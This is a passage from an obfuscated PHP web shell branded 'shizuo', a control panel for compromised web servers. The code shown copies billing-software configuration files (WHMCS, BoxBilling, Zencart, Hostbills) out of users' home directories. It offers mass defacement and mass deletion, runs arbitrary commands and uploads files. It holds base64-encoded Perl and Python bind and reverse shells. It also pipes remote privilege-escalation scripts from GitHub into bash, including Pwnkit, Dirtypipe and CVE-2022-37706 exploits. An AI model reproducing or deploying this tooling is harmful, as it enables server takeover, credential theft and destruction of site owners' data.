7/CLIENTAREA/submitticket.php"=>"WHMCS","/home/$yag87770677/Clientarea/submitticket.php"=>"WHMCS","/home/$yag87770677/clientarea/submitticket.php"=>"WHMCS","/home/$yag87770677/SUPPORT/submitticket.php"=>"WHMCS","/home/$yag87770677/Support/submitticket.php"=>"WHMCS","/home/$yag87770677/support/submitticket.php"=>"WHMCS","/home/$yag87770677/BILLING/submitticket.php"=>"WHMCS","/home/$yag87770677/Billing/submitticket.php"=>"WHMCS","/home/$yag87770677/billing/submitticket.php"=>"WHMCS","/home/$yag87770677/BUY/submitticket.php"=>"WHMCS","/home/$yag87770677/Buy/submitticket.php"=>"WHMCS","/home/$yag87770677/buy/submitticket.php"=>"WHMCS","/home/$yag87770677/MANAGE/submitticket.php"=>"WHMCS","/home/$yag87770677/Manage/submitticket.php"=>"WHMCS","/home/$yag87770677/manage/submitticket.php"=>"WHMCS","/home/$yag87770677/CLIENTSUPPORT/submitticket.php"=>"WHMCS","/home/$yag87770677/ClientSupport/submitticket.php"=>"WHMCS","/home/$yag87770677/Clientsupport/submitticket.php"=>"WHMCS","/home/$yag87770677/clientsupport/submitticket.php"=>"WHMCS","/home/$yag87770677/CHECKOUT/submitticket.php"=>"WHMCS","/home/$yag87770677/Checkout/submitticket.php"=>"WHMCS","/home/$yag87770677/checkout/submitticket.php"=>"WHMCS","/home/$yag87770677/BILLINGS/submitticket.php"=>"WHMCS","/home/$yag87770677/Billings/submitticket.php"=>"WHMCS","/home/$yag87770677/billings/submitticket.php"=>"WHMCS","/home/$yag87770677/BASKET/submitticket.php"=>"WHMCS","/home/$yag87770677/Basket/submitticket.php"=>"WHMCS","/home/$yag87770677/basket/submitticket.php"=>"WHMCS","/home/$yag87770677/SECURE/submitticket.php"=>"WHMCS","/home/$yag87770677/Secure/submitticket.php"=>"WHMCS","/home/$yag87770677/secure/submitticket.php"=>"WHMCS","/home/$yag87770677/SALES/submitticket.php"=>"WHMCS","/home/$yag87770677/Sales/submitticket.php"=>"WHMCS","/home/$yag87770677/sales/submitticket.php"=>"WHMCS","/home/$yag87770677/BILL/submitticket.php"=>"WHMCS","/home/$yag87770677/Bill/submitticket.php"=>"WHMCS","/home/$yag87770677/bill/submitticket.php"=>"WHMCS","/home/$yag87770677/PURCHASE/submitticket.php"=>"WHMCS","/home/$yag87770677/Purchase/submitticket.php"=>"WHMCS","/home/$yag87770677/purchase/submitticket.php"=>"WHMCS","/home/$yag87770677/ACCOUNT/submitticket.php"=>"WHMCS","/home/$yag87770677/Account/submitticket.php"=>"WHMCS","/home/$yag87770677/account/submitticket.php"=>"WHMCS","/home/$yag87770677/USER/submitticket.php"=>"WHMCS","/home/$yag87770677/User/submitticket.php"=>"WHMCS","/home/$yag87770677/user/submitticket.php"=>"WHMCS","/home/$yag87770677/CLIENTS/submitticket.php"=>"WHMCS","/home/$yag87770677/Clients/submitticket.php"=>"WHMCS","/home/$yag87770677/clients/submitticket.php"=>"WHMCS","/home/$yag87770677/BILLINGS/submitticket.php"=>"WHMCS","/home/$yag87770677/Billings/submitticket.php"=>"WHMCS","/home/$yag87770677/billings/submitticket.php"=>"WHMCS","/home/$yag87770677/MY/submitticket.php"=>"WHMCS","/home/$yag87770677/My/submitticket.php"=>"WHMCS","/home/$yag87770677/my/submitticket.php"=>"WHMCS","/home/$yag87770677/secure/whm/submitticket.php"=>"WHMCS","/home/$yag87770677/secure/whmcs/submitticket.php"=>"WHMCS","/home/$yag87770677/panel/submitticket.php"=>"WHMCS","/home/$yag87770677/clientes/submitticket.php"=>"WHMCS","/home/$yag87770677/cliente/submitticket.php"=>"WHMCS","/home/$yag87770677/support/order/submitticket.php"=>"WHMCS","/home/$yag87770677/bb-config.php"=>"BoxBilling","/home/$yag87770677/boxbilling/bb-config.php"=>"BoxBilling","/home/$yag87770677/box/bb-config.php"=>"BoxBilling","/home/$yag87770677/host/bb-config.php"=>"BoxBilling","/home/$yag87770677/Host/bb-config.php"=>"BoxBilling","/home/$yag87770677/supportes/bb-config.php"=>"BoxBilling","/home/$yag87770677/support/bb-config.php"=>"BoxBilling","/home/$yag87770677/hosting/bb-config.php"=>"BoxBilling","/home/$yag87770677/cart/bb-config.php"=>"BoxBilling","/home/$yag87770677/order/bb-config.php"=>"BoxBilling","/home/$yag87770677/client/bb-config.php"=>"BoxBilling","/home/$yag87770677/clients/bb-config.php"=>"BoxBilling","/home/$yag87770677/cliente/bb-config.php"=>"BoxBilling","/home/$yag87770677/clientes/bb-config.php"=>"BoxBilling","/home/$yag87770677/billing/bb-config.php"=>"BoxBilling","/home/$yag87770677/billings/bb-config.php"=>"BoxBilling","/home/$yag87770677/my/bb-config.php"=>"BoxBilling","/home/$yag87770677/secure/bb-config.php"=>"BoxBilling","/home/$yag87770677/support/order/bb-config.php"=>"BoxBilling","/home/$yag87770677/includes/dist-configure.php"=>"Zencart","/home/$yag87770677/zencart/includes/dist-configure.php"=>"Zencart","/home/$yag87770677/products/includes/dist-configure.php"=>"Zencart","/home/$yag87770677/cart/includes/dist-configure.php"=>"Zencart","/home/$yag87770677/shop/includes/dist-configure.php"=>"Zencart","/home/$yag87770677/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/hostbills/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/host/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/Host/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/supportes/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/support/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/hosting/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/cart/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/order/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/client/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/clients/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/cliente/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/clientes/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/billing/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/billings/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/my/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/secure/includes/iso4217.php"=>"Hostbills","/home/$yag87770677/support/order/includes/iso4217.php"=>"Hostbills");foreach($csg2312585810 as $nbt3565825916=>$owm1454944971){$npf1092713712=file_get_contents($nbt3565825916);if($npf1092713712==''){}else{$cmm1822230979=fopen("shizuo_CONFIG/$yag87770677-$owm1454944971.txt","w");fputs($cmm1822230979,$npf1092713712);}}}}}}echo"<center><a style='text-decoration:none;color:white;' href='?path=$sol190089999/shizuo_CONFIG'><font>Click Here</font></a></center>";}if($azu3293050475['id']=='adminer'){echo "<center class='anu'>Get Adminer<br>";function adminer($wdu4101391790,$dez2285623924){$tfi578531298=fopen($dez2285623924,"w");$vcz1281410033=curl_init();curl_setopt($vcz1281410033,CURLOPT_URL,$wdu4101391790);curl_setopt($vcz1281410033,CURLOPT_BINARYTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_RETURNTRANSFER,true);curl_setopt($vcz1281410033,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($vcz1281410033,CURLOPT_FILE,$tfi578531298);return curl_exec($vcz1281410033);curl_close($vcz1281410033);fclose($tfi578531298);ob_flush();flush();}if(file_exists('adminer.php')){echo"<gr><a style='color:white;text-decoration:none;' href='$jxg3766473888/adminer.php' target='_blank'>Click Here</a></gr></center>";}else{if(adminer("","adminer.php")){echo"<gr><a style='color:white;text-decoration:none;' href='$jxg3766473888/adminer.php' target='_blank'>Click Here</a></gr></center>";}else{echo "<rd>Failed to create adminer:(</rd>";}}echo "</center>";}if($azu3293050475['id']=='deface'){function mass_all($oex3131800080,$vgn3319867140,$sls386395195){if(is_writable($oex3131800080)){$zrk4122608989=scandir($oex3131800080);foreach($zrk4122608989 as $oib1823692007){$zac464807025="$oex3131800080/$oib1823692007";$zfh1659275802=$zac464807025.'/'.$vgn3319867140;if($oib1823692007==='.'){file_put_contents($zfh1659275802,$sls386395195);}elseif($oib1823692007==='..'){file_put_contents($zfh1659275802,$sls386395195);}else{if(is_dir($zac464807025)){if(is_writable($zac464807025)){echo"[<gr><i class='bi bi-check-all'></i></gr>] $zfh1659275802<br>";file_put_contents($zfh1659275802,$sls386395195);$vvr311197333=mass_all($zac464807025,$vgn3319867140,$sls386395195);}}}}}}function mass_onedir($oex3131800080,$vgn3319867140,$sls386395195){if(is_writable($oex3131800080)){$zrk4122608989=scandir($oex3131800080);foreach($zrk4122608989 as $oib1823692007){$zac464807025="$oex3131800080/$oib1823692007";$zfh1659275802=$zac464807025.'/'.$vgn3319867140;if($oib1823692007==='.'){file_put_contents($zfh1659275802,$sls386395195);}elseif($oib1823692007==='..'){file_put_contents($zfh1659275802,$sls386395195);}else{if(is_dir($zac464807025)){if(is_writable($zac464807025)){echo"[<gr><i class='bi bi-check-all'></i></gr>] $oib1823692007/$vgn3319867140<br>";file_put_contents($zfh1659275802,$sls386395195);}}}}}}if($azu3293050475['start']){if($azu3293050475['tipe']=='mass'){mass_all($azu3293050475['d_dir'],$azu3293050475['d_file'],$azu3293050475['script']);}elseif($azu3293050475['tipe']=='onedir'){mass_onedir($azu3293050475['d_dir'],$azu3293050475['d_file'],$azu3293050475['script']);}}s();echo '<center class="anu">Mass Deface</center>';echo"
<div class='card card-body text-dark input-group mb-3'>
<form method='POST'> Select Type:
<div class='form-check'>
<input class='form-check-input' type='checkbox' value='onedir' name='tipe' id='flexCheckDefault' checked>
<label class='form-check-label' for='flexCheckDefault'>One directory</label>
</div>
<div class='form-check'>
<input class='form-check-input' type='checkbox' value='mass' name='tipe' id='flexCheckDefault'>
<label class='form-check-label' for='flexCheckDefault'>All directory</label>
</div>
<i class='bi bi-folder'></i> Directory:
<input class='form-control btn-sm text-dark' type='text' name='d_dir' value='$oex3131800080'>
<i class='bi bi-file-earmark'></i> Filename:
<input class='form-control btn-sm text-dark' type='text' name='d_file' placeholder='README.txt'>
<i class='bi bi-file-earmark'></i> Your Script:
<textarea class='form-control btn-sm text-dark' rows='7' name='script' placeholder='Hacked by shizuo'></textarea>
<div class='d-grid gap-2'>
<input class='btn btn-dark btn-sm' type='submit' name='start' value='Deface!'>
</div>
</form>
</div>";}if($azu3293050475['id']=='delete'){function mass_delete($oex3131800080,$vgn3319867140){if(is_writable($oex3131800080)){$zrk4122608989=scandir($oex3131800080);foreach($zrk4122608989 as $oib1823692007){$zac464807025="$oex3131800080/$oib1823692007";$zfh1659275802=$zac464807025.'/'.$vgn3319867140;if($oib1823692007==='.'){if(file_exists("$oex3131800080/$vgn3319867140")){unlink("$oex3131800080/$vgn3319867140");}}elseif($oib1823692007==='..'){if(file_exists("".dirname($oex3131800080)."/$vgn3319867140")){unlink("".dirname($oex3131800080)."/$vgn3319867140");}}else{if(is_dir($zac464807025)){if(is_writable($zac464807025)){if(file_exists($zfh1659275802)){echo"[<gr><i class='bi bi-check-all'></i></gr>] $zfh1659275802<br>";unlink($zfh1659275802);$vvr311197333=mass_delete($zac464807025,$vgn3319867140);}}}}}}}if($azu3293050475['start']){mass_delete($azu3293050475['d_dir'],$azu3293050475['d_file']);}s();echo '<center class="anu">Mass Delete</center>';echo"
<div class='card card-body text-dark input-group mb-3'>
<form method='POST'>
<i class='bi bi-folder'></i> Directory:
<input class='form-control btn-sm text-dark' type='text' name='d_dir' value='$oex3131800080' $hqb3270591348>
<i class='bi bi-file-earmark'></i> Filename:
<div class='input-group'>
<input class='form-control btn-sm text-dark' type='text' name='d_file' placeholder='filename' $hqb3270591348><br>
<div class='input-group-append'>
<input class='btn btn-dark btn-sm' type='submit' name='start' value='Delete!'>
</div>
</div>
</form>
</div>";}if($azu3293050475['id']=='network'){s();echo '<center class="anu">Network</center>';echo "
<div class='card text-dark'>
<div class='card-header'>
<form method='post'>
Bind port to /bin/sh [perl]<br>
Port:
<div class='input-group'>
<input class='form-control btn-sm text-dark' type='text' name='port' placeholder='1337'>
<input class='btn btn-dark btn-sm' type='submit' name='bpl' value='Submit!'>
</div>
Back Connect<br>
Server:
<input class='form-control btn-sm text-dark' type='text' name='server' placeholder='".$_SERVER['REMOTE_ADDR']."'>
Port:
<div class='input-group'>
<input class='form-control btn-sm text-dark' type='text' name='port' placeholder='1337'>
<select class='form-control btn-sm text-dark' name='bc'>
<option value='perl'>perl</option>
<option value='python'>python</option>
</select>
</div>
<div class='d-grid gap-2'>
<input class='btn btn-dark btn-sm btn-block' type='submit' value='Submit!'>
</div>
</form>";if($azu3293050475['bpl']){$giz1175939814=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");$lzk4268976141=@fopen('bp.pl','w');fwrite($lzk4268976141,$giz1175939814);$bpp3119148441=exe("perl bp.pl ".$azu3293050475['port']." 1>/dev/null 2>&1 &");sleep(1);echo"<pre>$amk4049756767".exe("ps aux | grep bp.pl")."</pre>";unlink("bp.pl");}if($azu3293050475['bc']=='perl'){$jkk3265866552=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");$trn2294707203=@fopen('bc.pl','w');fwrite($trn2294707203,$jkk3265866552);$bpp3119148441=exe("perl bc.pl ".$azu3293050475['server']." ".$azu3293050475['port']." 1>/dev/null 2>&1 &");sleep(1);echo"<pre>$amk4049756767".exe("ps aux | grep bc.pl")."</pre>";unlink("bc.pl");}if($azu3293050475['bc']=='python'){$jvw1833259582=base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk=");$emi294062401=@fopen('bcpy.py','w');fwrite($emi294062401,$jvw1833259582);$eyg4228488635=exe("python bcpy.py ".$azu3293050475['server']." ".$azu3293050475['port']);sleep(1);echo"<pre>$ezv608682059".exe("ps aux | grep bcpy.py")."</pre>";unlink("bcpy.py");}echo "</div>
</div>
<br/>";}if($azu3293050475['id']=='cmd'){s();echo '<center class="anu">Command</center>';if(!empty($_POST['cmd'])){$enu794565824=exe($_POST['cmd'].' 2>&1');}echo "
<div class='mb-3'>
<form method='POST'>
<div class='input-group mb-3'>
<input class='form-control btn-sm text-dark' type='text' name='cmd' value='".htmlspecialchars($_POST['cmd'],ENT_QUOTES,'UTF-8')."' placeholder='whoami' $hqb3270591348>
<button class='btn btn-outline-light btn-sm' type='sumbit'><i class='bi bi-arrow-return-right'></i></button>
</div>
</form>";if($enu794565824):echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;">$ <rd>'.htmlspecialchars($_POST['cmd']).'</rd><br><code>'.htmlspecialchars($enu794565824,ENT_QUOTES,'UTF-8').'</code></pre>
</div>
</div>';elseif(!$enu794565824&&$_SERVER['REQUEST_METHOD']=='POST'):echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>No result</code></pre>
</div>
</div>
</div>';endif;}if($azu3293050475['id']=='upload'){s();echo '<center class="anu">Upload (Multiple File Upload)</center>';if(isset($azu3293050475['upl'])){$mdb325763347=count($_FILES['file']['name']);for($gkk3036287351=0;$gkk3036287351<$mdb325763347;$gkk3036287351++){$vgn3319867140=$_FILES['file']['name'][$gkk3036287351];$hxf1133833840=@copy($_FILES['file']['tmp_name'][$gkk3036287351],"$sol190089999/".$vgn3319867140);}if($mdb325763347<2){if($hxf1133833840){echo"<strong>Upload</strong> $vgn3319867140 OK! ".ok()."</div>";}else{echo '<strong>Upload</strong> FAIL! '.er().'</div>';}}else{echo"<strong>Upload</strong> $mdb325763347 OK! ".ok()."</div>";}}echo"
<div class='card card-body text-dark input-group mb-3'>
Multiple File Upload
<form method='POST' enctype='multipart/form-data'>
<div class='input-group'>
<input class='form-control form-control-sm text-dark' type='file' name='file[]' multiple='' $hqb3270591348>
<input class='btn btn-dark btn-sm' type='submit' name='upl' value='Go!'>
</div>
</form>
</div>";}}if(isset($_GET['dir'])&&$_GET['id']=="scanroot"){ob_implicit_flush();ob_end_flush();s();echo '<center class="anu">Scan Root by shizuo</center>';echo "
<div class='text-center'>
<div class='btn-group mb-3'>
<a class='btn btn-outline-light btn-sm' href=http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."&id_two=autoscan><i class='bi bi-bug'></i> Auto Scan </a>
<a class='btn btn-outline-light btn-sm' href=http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."&id_two=scansd><i class='bi bi-search'></i> Scan SUID </a>
<a class='btn btn-outline-light btn-sm' href=http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."&id_two=esg><i class='bi bi-search'></i> Exploit Suggester </a>
<a class='btn btn-outline-light btn-sm' href=http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."&id_two=autoscan2><i class='bi bi-bug'></i> Auto Scan v2 </a>
<a class='btn btn-outline-light btn-sm' href=http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."&id_two=scansd2><i class='bi bi-search'></i> Scan SUID v2 </a>
<a class='btn btn-outline-light btn-sm' href=http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."&id_two=esg2><i class='bi bi-search'></i> Exploit Suggester v2 </a>
<a class='btn btn-outline-light btn-sm' href=http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."&id_two=lpesh><i class='bi bi-bug'></i> CVE-2022-37706 LPE </a>
<a class='btn btn-outline-light btn-sm' href=http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."&id_two=lpesh2><i class='bi bi-bug'></i> CVE-2022-37706 LPE v2</a>
</div>
</div>";if(!function_exists("proc_open")){echo "<center class='anu'>Command is Disabled!</center>";}if(!is_writable($sol190089999)){echo "<center class='anu'>Current Directory is Unwriteable!</center>";}if(isset($_GET['id_two'])&&$_GET['id_two']=="autoscan"){if(!file_exists($sol190089999."/shizuorooting/")){mkdir($sol190089999."/shizuorooting");exe_root("curl https://raw.githubusercontent.com/newbee1337/shizuos-minishell/main/tools/auto.tar.gz -o auto.tar.gz",$sol190089999."/shizuorooting");exe_root("tar -xf auto.tar.gz",$sol190089999."/shizuorooting");if(!file_exists($sol190089999."/shizuorooting/netfilter")){die("<center class='anu'>Failed to Download Material !</center>");}}echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>Netfilter : '.exe_root("timeout 10 ./shizuorooting/netfilter",$sol190089999).'Ptrace : '.exe_root("echo id | timeout 10 ./shizuorooting/ptrace",$sol190089999).'Sequoia : '.exe_root("timeout 10 ./shizuorooting/sequoia",$sol190089999).'OverlayFS : '.exe_root("echo id | timeout 10 ./overlayfs",$sol190089999."/shizuorooting").'Dirtypipe : '.exe_root("echo id | timeout 10 ./shizuorooting/dirtypipe /usr/bin/su",$sol190089999).'Sudo : '.exe_root("echo 12345 | timeout 10 sudoedit -s Y",$sol190089999).'Pwnkit : '.exe_root("echo id | timeout 10 ./pwnkit",$sol190089999."/shizuorooting").''.exe_root("rm -rf shizuorooting",$sol190089999).'</code></pre>
</div>
</div>';}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="scansd"){echo '<center class="anu">Please wait..</center>';echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.exe_root("find / -perm -u=s -type f 2>/dev/null",$sol190089999).'</code></pre>
</div>
</div>';}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="esg"){echo '<center class="anu">Please wait..</center>';echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.exe_root("curl -Lsk https://raw.githubusercontent.com/newbee1337/shizuos-minishell/main/tools/esg.sh | bash",$sol190089999).'</code></pre>
</div>
</div>';}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="autoscan2"){if(!file_exists($sol190089999."/shizuorooting/")){mkdir($sol190089999."/shizuorooting");exe("curl https://raw.githubusercontent.com/newbee1337/shizuos-minishell/main/tools/auto.tar.gz -o auto.tar.gz",$sol190089999."/shizuorooting");exe("tar -xf auto.tar.gz",$sol190089999."/shizuorooting");if(!file_exists($sol190089999."/shizuorooting/netfilter")){die("<center class='anu'>Failed to Download Material!</center>");}}echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>Netfilter : '.exe("timeout 10 ./shizuorooting/netfilter",$sol190089999).'Ptrace : '.exe("echo id | timeout 10 ./shizuorooting/ptrace",$sol190089999).'Sequoia : '.exe("timeout 10 ./shizuorooting/sequoia",$sol190089999).'OverlayFS : '.exe("echo id | timeout 10 ./overlayfs",$sol190089999."/shizuorooting").'Dirtypipe : '.exe("echo id | timeout 10 ./shizuorooting/dirtypipe /usr/bin/su",$sol190089999).'Sudo : '.exe("echo 12345 | timeout 10 sudoedit -s Y",$sol190089999).'Pwnkit : '.exe("echo id | timeout 10 ./pwnkit",$sol190089999."/shizuorooting").''.exe("rm -rf shizuorooting",$sol190089999).'</code></pre>
</div>
</div>';}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="scansd2"){echo '<center class="anu">Please wait..</center>';echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.exe("find / -perm -u=s -type f 2>/dev/null",$sol190089999).'</code></pre>
</div>
</div>';}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="esg2"){echo '<center class="anu">Please wait..</center>';echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.exe("curl -Lsk https://raw.githubusercontent.com/newbee1337/shizuos-minishell/main/tools/esg.sh | bash",$sol190089999).'</code></pre>
</div>
</div>';}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="lpesh"){echo '<center class="anu">Please wait..</center>';echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.exe_root("curl -Lsk https://raw.githubusercontent.com/newbee1337/shizuos-minishell/main/tools/lpe.sh | bash",$sol190089999).'</code></pre>
</div>
</div>';}elseif(isset($_GET['id_two'])&&$_GET['id_two']=="lpesh2"){echo '<center class="anu">Please wait..</center>';echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.exe("curl -Lsk https://raw.githubusercontent.com/newbee1337/shizuos-minishell/main/tools/lpe.sh | bash",$sol190089999).'</code></pre>
</div>
</div>';}}if(isset($azu3293050475['opn'])){$kxc2359244304=$azu3293050475['opn'];}if($azu3293050475['action']=='view'){s();echo"
<div class='btn-group'>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=view&opn=$kxc2359244304'><i class='bi bi-eye-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=edit&opn=$kxc2359244304'><i class='bi bi-pencil-square'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=rename&opn=$kxc2359244304'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=download&opn=$kxc2359244304'><i class='bi bi-download'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir=$sol190089999&action=delete_file&opn=$kxc2359244304'><i class='bi bi-trash-fill'></i></a>
</div>
<br>
<i class='bi bi-file-earmark'></i>: ".basename($kxc2359244304)."
</br>
<div class='bg-dark'>
<div class='container-fluid language-javascript'>
<textarea rows='10' class='form-control' disabled=''>".htmlspecialchars(file_get_contents($kxc2359244304))."</textarea>
</div>
</div>";}if(isset($azu3293050475['edit_file'])){$yrv2142108772=fopen("$kxc2359244304","w");$mdb325763347=fwrite($yrv2142108772,$azu3293050475['contents']);if($mdb325763347){echo '<strong>Edit file</strong> OK! '.ok().'</div>';}else{echo '<strong>Edit file</strong> FAIL! '.er().'</div>';}}if($azu3293050475['action']=='edit'){s();echo"
<div class='btn-group'>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=view&opn=$kxc2359244304'><i class='bi bi-eye-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=edit&opn=$kxc2359244304'><i class='bi bi-pencil-square'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=rename&opn=$kxc2359244304'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=download&opn=$kxc2359244304'><i class='bi bi-download'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir=$sol190089999&action=delete_file&opn=$kxc2359244304'><i class='bi bi-trash-fill'></i></a>
</div>
<br>
<i class='bi bi-file-earmark'></i>: ".basename($kxc2359244304)."
</br>
<form method='POST'>
<textarea class='form-control btn-sm' rows='10' name='contents' $hqb3270591348>".htmlspecialchars(file_get_contents($kxc2359244304))."</textarea>
<div class='d-grid gap-2'><br>
<button class='btn btn-outline-light btn-sm' type='sumbit' name='edit_file'><i class='bi bi-arrow-return-right'></i></button>
</div>
</form>";}if($azu3293050475['action']=='rename_folder'){if($azu3293050475['r_d']){$ngo3754459638=rename($oex3131800080,"".dirname($oex3131800080)."/".htmlspecialchars($azu3293050475['r_d'])."");if($ngo3754459638){echo '<strong>Rename folder</strong> OK! '.ok().'<a class="btn-close" href="?path='.dirname($oex3131800080).'"></a></div>';}else{echo '<strong>Rename folder</strong> FAIL! '.er().'<a class="btn-close" href="?path='.dirname($oex3131800080).'"></a></div>';}}s();echo"
<div class='btn-group'>
<a class='btn btn-outline-dark btn-sm' href='?dir=$sol190089999&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir=$sol190089999&action=delete_folder'><i class='bi bi-trash-fill'></i></a>
</div>
<br>
<i class='bi bi-folder-fill'></i>: ".basename($oex3131800080)."
</br>
<form method='POST'>
<div class='input-group'>
